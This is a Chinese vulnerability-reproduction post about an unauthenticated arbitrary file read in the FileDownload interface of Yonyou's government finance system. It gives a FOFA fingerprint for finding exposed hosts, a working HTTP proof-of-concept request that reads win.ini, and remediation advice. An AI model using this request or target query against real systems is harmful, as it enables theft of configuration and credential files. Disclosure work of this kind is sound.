漏洞复现 | 用友政务财务系统FileDownload接口任意文件读取漏洞【附poc】

一、漏洞简述

用友政务财务系统具有多项核心功能，旨在满足各类组织的财务管理需求。首先，它提供了财务核算功能，能够全面管理企业的总账、固定资产、现金、应付应收等模块，实时掌握企业的财务状况，并通过科目管理、凭证处理、报表分析等功能为决策提供有力支持。其FileDownload 接口存在任意文件读取漏洞，未经身份认证恶意攻击者可以读取系统重要文件（如系统配置文件、数据库配置文件）等等。

二、网络测绘

fofa：body="/df/portal/getYearRgcode.do"

三、漏洞复现

测试读取win.ini文件

四、漏洞检测poc

GET /bg/attach/FileDownload?execlPath=C://Windows//win.ini HTTP/1.1Host: 0.0.0.0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1

五、漏洞修复

1、建议联系厂商打补丁或升级版本。

2、增加Web应用防火墙防护。

3、关闭互联网暴露面或接口设置访问权限。

免责声明

本文仅用于技术学习和讨论。请勿使用本文所提供的内容及相关技术从事非法活动，由于传播、利用此文所提供的内容或工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果均与文章作者及本账号无关，本次测试仅供学习使用。如有内容争议或侵权，请及时私信我们！我们会立即删除并致歉。谢谢！

原文始发于微信公众号（实战安全研究）：漏洞复现 | 用友政务财务系统FileDownload接口任意文件读取漏洞【附poc】